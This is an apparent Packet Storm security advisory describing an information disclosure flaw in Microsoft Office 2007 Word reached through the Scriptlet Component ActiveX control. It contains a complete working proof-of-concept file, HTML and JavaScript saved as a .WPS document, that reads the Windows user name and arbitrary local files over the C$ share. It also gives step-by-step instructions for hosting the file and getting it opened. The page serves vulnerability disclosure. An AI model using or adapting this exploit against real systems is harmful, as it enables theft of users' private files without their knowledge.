what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Office 2007 Word Information Disclosure

Microsoft Office 2007 Word Information Disclosure
Posted Oct 1, 2017
Authored by Eduardo Braun Prado

Microsoft Office 2007 Word suffers from an information disclosure vulnerability.

tags | exploit, info disclosure
SHA-256 | c9b6bb05b51dd531cede6d08c5bfdad7704a05145db11d28203d5380ae3673b9

Microsoft Office 2007 Word Information Disclosure

Change Mirror Download
MS Office Word Information Disclosure Vulnerability

Vendor homepage: http://www.microsoft.com/

MS Office homepage: https://products.office.com/

MS Office Word contains an Internet Explorer (IE) Script execution issue through a currently well known vector:
The "Microsoft Scriptlet Component" ActiveX.
Originally found by info sec. researcher Juan Pablo Lopez Yacubian and made public on May, 2008, this issue
allowed web pages to be displayed, inline, in Office documents, rendered by the MS IE rendering engine.
This issue facilitates attacks against the IE rendering engine because some enhanced security features
are not enabled by default. However, Microsoft didn't think it would be suitable to disable the ActiveX,
back in 2008, for some unknown reason; Additionally, it was not (publicly) known that you could pass
relative URLs to the ActiveX, causing Word/Works documents to reference itself, as HTML, potentially
disclosing sensitive information to malicious attackers, like file contents, the Windows user name, etc..

The PoC below will display, on an alert box, the contents of 'WindowsUpdate.log', that, depending on the
Windows patch level, used to be located on "c:\windows" directory, but currently it resides in the user
that applied the updates directory:

c:\users\%username%\AppData\Local\Microsoft\Windows


Instructions:

a) Save the code below as "Disclose_File.WPS" and host it on your web server of choice.

b) Download it using your prefered web browser, and save it to one of your user's profile subfolders.
(Could be the home directory too, however nowadays most browsers by default will save the file to the
'Downloads' folder.

c) Open and wait for an alert box showing the contents of "WindowsUpdate.log" to show up. Notice you
can pick up any file as long as you know the full path.

Important: the file must be downloaded and forced in the "Internet Zone" of IE, through the mark of
the web, which is appended by several programs to files downloaded from the web.




-------------Disclose_File.WPS------------------------------------------------------------
<html><body>

<!-- if you want another file name for the Word/Works document, overwrite the 'Disclose_File.wps' with
the file name you wish -->

<object classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389>
<param name=url value="Disclose_File.wps">
</object>


<script language=javascript>


var loc = document.location.href.toLowerCase();

var locNoProtocol = loc.substring(8,loc.length);

var b1 = locNoProtocol.indexOf(String.fromCharCode(47));

var b2 = locNoProtocol.indexOf(String.fromCharCode(47), b1+1);

var b3 = locNoProtocol.indexOf(String.fromCharCode(47), b2+1);

var b4 = locNoProtocol.indexOf(String.fromCharCode(47), b3+1);

var usr = locNoProtocol.substring(b3+1,b4); // returns the Windows user name, when this document is referenced

// through the default "C$" share.



var fileToDisclose = "file://127.0.0.1/c$/users/" + usr + "/appdata/local/microsoft/windows/windowsupdate.log";

// change the above path to match another file you wish to grab the contents.


var t = loc.indexOf("c:"); // Assuming the drive letter for Windows install, including the user's profile is 'c:'
var tr = loc.indexOf("c$");

if (t != -1)
{

var ns = loc.substring(t+2,loc.length);



document.write('<iframe src="file://127.0.0.1/c$' + ns + '"></iframe>');

}

else if (tr != -1)
{
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",fileToDisclose,0);
x.Send();
fileContents = x.ResponseText;

alert(fileContents);

}

</script>

</body>

</html>

-------------------------------------------------------------------------------------------------------------------

Vulnerable: MS Office 2007

MS Office 2010,2013,2016 have killbitted this ActiveX through specific MS Office killbit settings. If an attacker
is able to somehow bypass it, the vulnerability will surely affect the latest versions.

Tested on: Any Windows version that suppors Office 2007.

Greets to: Juan Pablo Lopez Yacubian, my good friend and original discoverer of the IE Script Exec issue.





Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close